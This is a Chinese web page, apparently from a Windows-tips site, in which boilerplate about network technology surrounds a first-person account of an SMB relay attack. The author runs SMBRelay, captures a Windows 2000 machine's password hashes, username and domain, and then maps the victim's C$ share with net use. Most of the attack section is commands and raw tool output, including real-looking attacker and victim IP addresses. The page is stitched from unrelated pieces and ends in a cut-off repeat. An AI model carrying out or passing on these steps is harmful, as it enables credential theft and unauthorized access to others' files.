发布时间:2023-09-13 来源:win7旗舰版 浏览量:
|
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。 说明::这次攻击过程只需要2台机器,3个IP地址 关于协议与IP问题的说明: 我的IP是218.197.248.212,可是SMBRELAY无法运行在这个IP上,而且我只有把自己机器上“打印机与文件共享”服务删除后才能接受目标机器传来的HASH,218.197.248.154是一个不存在的IP地址,所以我把SMBRELAY绑在218.197.248.154上,测试的时候,实际上是 212(我自己)-----154(绑SMBRELAY的机器)----249(受害机器) ---------------------------------------------------------------------D:\>smbrelay.exe /IL 2 /IR 2 /L+ 218.197.248.154 /R- 218.197.248.154 SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to sirdystic@cultdeadcow.com Using local adapter index 2: PCI Bus Master Adapter Local IP address added to interface 2 Bound to port 139 on address 218.197.248.154 Connection from 202.114.28.249:1915 Request type: Session Request 72 bytes Source name: VODSER <00> Target name: *SMBSERVER <20> Setting target name to source name and source name to <|>CDC4EVER<|>... Response: Positive Session Response 4 bytes Request type: Session Message 137 bytes SMB_COM_NEGOTIATE Response: Session Message 115 bytes Challenge (8 bytes): 33C0E036880693BB Request type: Session Message 290 bytes SMB_COM_SESSION_SETUP_ANDX Password lengths: 24 24 Case insensitive password: FA31DD7DA7659D4DB6273B2AC9AF9FCCEA912F843B5A1874 Case sensitive password: E53DFF557C5E7C37FD34FB5FD959CC26DB335F4C2AB44585 Username: "UUSER_VODSER" Domain: "VODSER" OS: "Windows 2000 2195" Lanman type: "Windows 2000 5.0" ???: "" Response: Session Message 154 bytes OS: "Windows 5.0" Lanman type: "Windows 2000 LAN Manager" Domain: "WORKGROUP" Password hash written to disk Connected? Bound to port 139 on address 218.197.248.154 relaying for host VODSER 202.114.28 .249 -------------------------------------------------------------------------------- 这时候,我已经抓到对方HASH了,下面是影射对方C盘 ---------------------------------------- E:\>net use \\218.197.248.154 命令成功完成。 E:\>net use h: \\218.197.248.154\c$ 命令成功完成。 ---------------------------------------------------------------------------- 第一屏的显示如下 --------------------------------------------------------- Connection rejected: 202.114.28.249 already connected *** Relay connection for target VODSER received from 218.197.248.212:1615 *** Sent positive session response for relay target VODSER *** Sent dialect selection response (5) for target VODSER *** Sent SMB Session setup response for relay to VODSER Termination requested... Deleted incoming IP address *** Relay disconnected from target VODSER *** Target VODSER Disconnected Exiting main ------------------------------------------------------------------------- 网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。 |
说明::这次攻击过程只需要2台机器,3个IP地址关于协议与IP问题的说明:我的IP是218.197
┆
